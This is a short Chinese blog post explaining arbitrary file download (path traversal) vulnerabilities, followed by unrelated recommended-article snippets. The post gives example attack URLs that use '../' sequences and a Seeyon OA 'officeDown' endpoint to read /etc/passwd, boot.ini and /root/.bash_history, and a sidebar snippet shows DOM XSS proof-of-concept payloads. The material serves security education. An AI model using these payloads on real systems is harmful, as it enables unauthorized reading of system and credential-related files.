文件下载深度剖析

最新推荐文章于 2022-03-04 11:14:12 发布
最新推荐文章于 2022-03-04 11:14:12 发布
阅读量293 收藏
点赞数
分类专栏: 网站安全 文章标签: 文件下载 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bul1et/article/details/84969354
版权

文件下载漏洞的原因就是后台没有严格的控制用户的输入,进而用户可以下载服务器上的任意的文件

实例

我们通过正常的页面流程来下载一个图片

这其实是个下载的页面  我们访问这个url,他就会下载一个图片。

但是服务器由于对用户的输入过滤不严格,这时我们就可以利用../来进行目录跳转到根目录来下载etc/passwd的文件

只要我们输入足够多的../他是可以跳转到服务器的根目录的,这时候我们假设他是linux操作系统,来下载/etc/passwd的文件

如果是windows操作系统,就去跳转下载这个文件C:/windows/win.ini

 

http://x.x.x.x/seeyon/main.do?method=officeDown&filename=c:/boot.ini
http://x.x.x.x/seeyon/main.do?method=officeDown&filename=etc/passwd

?filePath=../../../../../../../../../../../root/.bash_history

冲冲_冲
关注
专栏目录
Dubbo 深度剖析
偶尔思绪会留在这里
10-18 197
Apache Dubbo 是一个高性能、基于 Java 的开源 RPC 框架。请访问官方网站获取快速入门指南和文档,以及 wiki 获取新闻、常见问题解答和发行说明。 我们正在收集 Dubbo 用户信息,以帮助我们进一步改进 Dubbo。请在 issue#1012 上提供您的使用信息以支持我们:通缉:谁在使用 dubbo,谢谢:) Java语言自JDK1.0版本以来经历了许多次更新,也在基本程序库中增加了大量的类别和包。从J2SE 1.4开始,Java语言的变动由 Java Community Pro.
libevent上传和下载文件
最新发布
jianfeng123123的博客
07-10 206
该函数只能完成表单上传一个文件的功能。
libevent实现http服务器实现文件下载功能
03-24
1.libevent库编译工具为vs2019 2.环境为qt5.15.2 3.设置本地的目录,开启线程即可实现http服务器文件下载
Libevent C++高并发网络编程
04-13
LIBEVENT:是一款事件驱动的网络开发包,由于采用C语言开发体积小巧,跨平台,速度极快.课程中讲解分析 LIBEVENT原理,跨平台编译事件1O、缓冲O处理。讲解HTTP服务端开发示例,HTTP客户端请求开发示例,最后基于 LIBEVENTT创建线程池C++框架,并用此框架完成FTP服务器的登录、目录访问、文件上传下载能功能。开发环境操作系统: windows1064位和 ubuntu18.0464位Libevent版本:2.1.8Windows开发工具:VS2017社区版ubuntu开发工具:g++make开发语言:C/C++课程亮点全称代码演示:课程中的每一行代码都会敲出来,并详解代码实际案例展示:基于LIBEVENT实现线程池和HTTP和TP服务器跨平台讲解:基于 WINDOWS、LNUX( UBUNTU18.04)平台开发移植
使用libevent evhttp做服务器提供文件上传、下载、查询功能
weixin_45312249的博客
03-04 2326
文件上传 post接口/xpoc/ue-fse-uploadfd请求报文如下: 请求头header如下 body如下: //上传post接口/xpoc/ue-fse-uploadfd请求报文如下: 请求头header如下 在这里插入图片描述 //文件上传接口的回调处理函数 void HttpUpFile(struct evhttp_request *req, void *arg) { char * pBoundary = NULL; char strtemp[260];
HTTP文件上传和下载
02-17
利用wininet库实现文件的上传和下载
libevent源码深度剖析pdf
08-23
《libevent源码深度剖析》PDF是一份详细探讨libevent库源码的文档,它将一系列博客文章进行了整合,便于读者系统性地学习和理解libevent的核心机制。libevent是一个事件驱动的网络库,广泛应用于高性能服务器开发,...
web安全深度剖析
01-24
《Web安全深度剖析》这本书由张炳帅撰写,旨在深入探讨Web安全领域的核心技术和策略,为读者揭示网络攻防背后的原理与实践。本书通过全面解析Web应用的安全问题,提供了有效的检测和防御方案,帮助读者构建更为稳固...
python源码深度剖析(20-22章).pdf
07-21
根据给定的文件信息,我们需要对Python源码的深度剖析进行知识点的提炼,重点关注第20-22章中提到的内容。 首先,第20章探讨了Python虚拟机的工作原理,将其比作一颗软件CPU。在这一章节中,首先需要了解Python程序...
libevent安装文件及方法
08-01
libevent安装文件及方法,带libevent-1.4.13-stable.tar.gz
libevent配置程序-附已编译的libevent的lib和头文件
07-13
使用libevent编写的程序,配有博客教程,工程中的inc、lib为已编译的libevent,大家可以直接下载回去使用,免得再在官网下载
libevent和http服务端
12-26
http服务端, 解析客户端上传的资源类型,并在本地保存相应类型及名称的文件,
Libevent 源码文件结构分析
aggresss
04-15 1867
下载 Libevent 源码,切换到 2.1.8 稳定版本,步骤如下: git clone https://github.com/libevent/libevent.git cd libevent git checkout release-2.1.8-stable 在分析源码先要先对源码进行配置,因为 libevent/include/event2/event-config.h 文件只有在...
libevent(十三)http server 支持图像与文件下载,并获取表单POST
红叶谷 wsp_1138886114的博客
11-04 953
简单的请求访问: 浏览器请求相应的url,得到text,html, jpg, zip文件下载,提交表单等操作 main.cpp #include <iostream> #include <event2/event.h> #include <event2/http.h> #include <event2/keyvalq_struct.h> #include <event2/buffer.h> #include <string.h> #i.
Libevent库笔记(一)下载和编译,测试demo
skytering的博客
02-10 1291
Libevent库笔记(一)1.下载及编译1.1.下载1.2.编译1.2.1.说明1.2.2.Ubuntu平台编译和安装1.2.3.编译和测试demo1.2.4.Demo代码2.附录 nc命令 1.下载及编译 1.1.下载 官网:http://libevent.org/ 1.4和2.x系列版本,1.4 比较老,但源码简单,适合学习; 2.x 比较新,使用时建议用2.x版本,与1.4版本接口不兼容。...
Libevent的使用
qq_31776303的博客
06-21 267
首先当让是下载http://libevent.org/点击打开链接                下载完成后解压压缩包         在解压后的文件夹libevent-2.1.8-stable下找到        event_iocp.c        evthread_win32.c        listener.c        三个文件        打开在文件
libevent post下载文件
dp__mcu的专栏
07-12 1256
#if 0 //post方式从远程服务器下载一个文件 static struct event_base *base; static void http_request_file_done(struct evhttp_request *req, void *ctx) { char buffer[4097]; int nread; printf("http_reques
DOM型xss深度剖析
热门推荐
Bul1et的博客
12-19 1万+
有人说DOM型xss很鸡肋我却不以为然,对于我来说任何漏洞都是有利用价值的。 的确DOM型的xss不像反射型xss和存储型xss那样会与后台交互,DOM型xss的实现过程都是在前台 介绍两种场景的DOM型xss 两种场景都适用的POC #' onclick="alert(111)"&gt; 或者这个POC #"&gt;&lt;img src=@ onerror=alert(1)&g...
木马查杀深度剖析:从扫盲到自启动项
"木马查杀深度剖析" 木马,全称特洛伊木马(Trojan Horse),是一种恶意软件,其名称来源于古希腊神话。它伪装成合法的程序,诱导用户下载并安装,然后在用户的计算机系统中隐藏,执行未经授权的操作,如窃取敏感信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值